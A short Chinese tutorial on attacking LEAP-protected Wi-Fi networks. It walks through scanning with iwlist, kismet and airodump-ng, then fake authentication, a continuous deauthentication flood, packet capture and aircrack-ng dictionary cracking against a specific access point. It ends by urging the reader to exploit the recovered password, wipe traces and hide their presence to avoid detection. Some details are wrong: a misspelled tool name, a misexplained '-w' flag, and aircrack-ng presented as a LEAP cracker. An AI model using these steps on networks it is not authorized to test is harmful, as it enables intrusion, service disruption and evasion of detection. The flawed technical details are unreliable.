📅  最后修改于: 2023-12-03 15:39:09.347000             🧑  作者: Mango
LEAP(Lightweight Extensible Authentication Protocol)是一种不再推荐使用的WLAN安全协议,其加密使用了MS-CHAPv2协议,可以被黑客轻易地破解。因此,对LEAP加密的WLAN进行渗透测试十分必要。
$ sudo iwlist wlan0 scan | grep -E 'ESSID|Address|Quality|Encryption'
输出结果如下:
ESSID:"Your WiFi"
Address: 9C:4E:20:D4:31:F4 (Tenda Technology)
22/70 Quality=32/70 Signal level=-78 dBm
Encryption key:on
这里输出的信息包括网络名(ESSID)、MAC地址和加密方式等。
$ sudo kismet
运行Kismet,可以扫描到更加详细的无线网络信息。如果目标网络被隐藏,可以使用如下命令探测:
$ sudo airodump-ng -c 6 --bssid 9C:4E:20:D4:31:F4 wlan0
这里的“-c”参数表示信道号,“--bssid”参数表示接入点MAC地址,“wlan0”代表网卡名称。
使用Aircrack-ng破解LEAP加密的WLAN密码:
$ sudo airmon-ng start wlan0
$ sudo airplay-ng --fakeauth 60 -a 9C:4E:20:D4:31:F4 wlan0mon
$ sudo airodump-ng --bssid 9C:4E:20:D4:31:F4 -c 6 -w capture wlan0mon
$ sudo aireplay-ng -0 0 -a 9C:4E:20:D4:31:F4 wlan0mon
$ sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 9C:4E:20:D4:31:F4 capture-01.cap
这里的“--fakeauth”参数表示欺骗接入点进行认证,“-w”参数表示输出密码到指定文件中。
成功获取口令后,还需要利用口令及弱点进行进一步渗透。
清理所有痕迹,并隐藏自己在系统中的存在,避免被发现。
对LEAP加密的WLAN进行渗透测试需要多轮扫描、探测、分析和攻击,而且需要使用多个工具进行协同作业。对于专业的渗透测试人员来说,这是一项日复一日研究和精进的技能。